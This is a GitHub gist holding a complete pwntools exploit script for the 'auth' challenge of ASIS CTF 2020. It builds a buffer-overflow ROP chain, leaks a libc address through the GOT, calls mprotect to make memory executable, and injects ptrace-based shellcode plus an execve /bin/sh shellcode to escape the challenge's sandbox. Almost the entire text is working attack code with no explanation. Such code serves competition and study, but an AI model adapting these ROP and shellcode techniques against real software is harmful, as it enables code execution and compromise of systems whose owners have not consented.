Skip to content

Instantly share code, notes, and snippets.

@dialluvioso

dialluvioso/auth.py

Created December 13, 2020 22:38
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save dialluvioso/d96144cef2a433a7e2459e0ae562c61d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save dialluvioso/d96144cef2a433a7e2459e0ae562c61d to your computer and use it in GitHub Desktop.
Download ZIP
Exploit for auth challenge ASIS CTF 2020
Raw
auth.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
HOST = "69.90.132.134"
PORT = 3317
LOCAL = False
#context.log_level = "debug"
context.terminal = ["tmux", "sp", "-h"]
context.arch = "amd64"
io = process(["./ld.so", "./auth", "/tmp/"], env = {"LD_PRELOAD": "./libc.so.6"})
pop_rsp = 0x0000000000401063 # pop rsp ; ret
pop_rdi = 0x00000000004019a3 # pop rdi ; ret
pop_rbp = 0x0000000000400e96 # pop rbp ; ret
pop_rsi = 0x00000000004017fa # pop rsi ; ret
pop_r14 = 0x00000000004017f9 # pop r14 ; ret
pop_rdx_rbx_rbp = 0x0000000000400e8f # pop rdx ; mov eax, 1 ; pop rbx ; pop rbp ; ret
prepare_ch_call = 0x000000000040183c # mov rdi, r12 ; call rbp
alarm_got = 0x0000000000603068
printf_main = 0x0000000000400E7C
read_fcsmp = 0x00000000004010EA
if LOCAL:
DELTA_ALARM = 0xcb2d0
DELTA_MPROTECT = 0xf8be0
else:
DELTA_ALARM = 0xe5f10
DELTA_MPROTECT = 0x11bb00
shellcode = asm("""
mov rax, 0x6e
syscall
mov r14, rax
mov r10, 0
mov rdx, 0
mov rsi, r14
mov rdi, 16
mov rax, 0x65
syscall
mov r10, 0
mov rdx, 0
mov rsi, 0x603200
mov rdi, r14
mov rax, 0x3d
syscall
mov r13, 0x603900
xor r15, r15
loop:
cmp r15, 7
je ok
mov r10, [r13+r15*4]
mov rax, r15
mov rcx, 4
mul rcx
add rax,0x00401000
mov rdx, rax
mov rsi, r14
mov rdi, 5
mov rax, 0x65
syscall
inc r15
jmp loop
ok:
mov rax, 0x00401000
mov qword ptr [0x603280], rax
mov r10, 0x603200
mov rdx, 0
mov rsi, r14
mov rdi, 13
mov rax, 0x65
syscall
mov rax, 0x3c
syscall
""")
payload = b""
payload += b"A" * 56
payload += p64(pop_rdx_rbx_rbp)
payload += p64(alarm_got) + p64(0x603180) + p64(0x603980)
payload += p64(printf_main)
payload += p64(0) * 3
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(0x603580)
payload += p64(pop_rdx_rbx_rbp)
payload += p64(0x500) + p64(0x603180) + p64(0x603980)
payload += p64(read_fcsmp)
payload += p64(0x0000000000400538) * 64
payload += p64(pop_rsp)
payload += p64(0x603580)
io.sendlineafter("Username:", payload)
io.recvuntil("Usage: ")
leak = u64(io.recvuntil("\x7f").ljust(8, b"\x00"))
log.info("leak: %#lx" % leak)
glibc = leak - DELTA_ALARM
log.info("glibc at %#lx" % glibc)
payload2 = b""
payload2 += p64(pop_rdi)
payload2 += p64(0x603000)
payload2 += p64(pop_rsi)
payload2 += p64(0x1000)
payload2 += p64(pop_rdx_rbx_rbp)
payload2 += p64(0x7) + p64(0x0) + p64(0x603980)
payload2 += p64(glibc + DELTA_MPROTECT)
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0x603900)
payload2 += p64(pop_rdx_rbx_rbp)
payload2 += p64(0x200) + p64(0x603180) + p64(0x603980)
payload2 += p64(read_fcsmp)
payload2 += p64(0x0000000000400538) * 64
payload2 += p64(pop_rdi)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0x603500)
payload2 += p64(pop_rdx_rbx_rbp)
payload2 += p64(0x200) + p64(0x603180) + p64(0x603980)
payload2 += p64(read_fcsmp)
payload2 += p64(0x0000000000400538) * 64
payload2 += p64(0x603500)
io.sendline(payload2)
dummy = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
io.sendline(dummy)
io.sendline(shellcode)
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment